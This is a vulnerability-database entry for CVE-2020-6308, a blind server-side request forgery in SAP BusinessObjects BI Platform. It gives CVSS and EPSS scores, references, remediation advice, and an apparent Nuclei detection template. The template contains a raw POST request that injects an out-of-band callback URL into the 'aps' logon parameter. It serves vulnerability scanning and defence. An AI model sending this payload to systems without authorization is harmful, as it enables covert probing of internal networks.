ProjectDiscoveryNUCLEI:CVE-2020-6308SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5.3 Medium
AI Score
Confidence
High
0.006 Low
EPSS
Percentile
77.9%
SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests.
id: CVE-2020-6308
info:
name: SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery
author: madrobot
severity: medium
description: |
SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests.
impact: |
Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access to internal resources or further attacks.
remediation: |
Apply the relevant security patches provided by SAP to mitigate this vulnerability.
reference:
- https://github.com/InitRoot/CVE-2020-6308-PoC
- https://launchpad.support.sap.com/#/notes/2943844
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196
- https://nvd.nist.gov/vuln/detail/CVE-2020-6308
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-6308
cwe-id: CWE-918
epss-score: 0.004
epss-percentile: 0.73121
cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sap
product: businessobjects_business_intelligence_platform
tags: cve2020,cve,sap,ssrf,oast,unauth
http:
- raw:
- |
POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: location
words:
- "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"
# digest: 4a0a0047304502206fcb723e77d14f6dfba93f21bf79b8017cfc96c4e7d4e0fbfa8fbf743a53cb9d022100b1dc9f0cc68fc6eceb0f30bbef24ce3526fed3c2fc7b3a2c9dc58a315871a212:922c64590222798bb761d5b6d8e72950Related
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5.3 Medium
AI Score
Confidence
High
0.006 Low
EPSS
Percentile
77.9%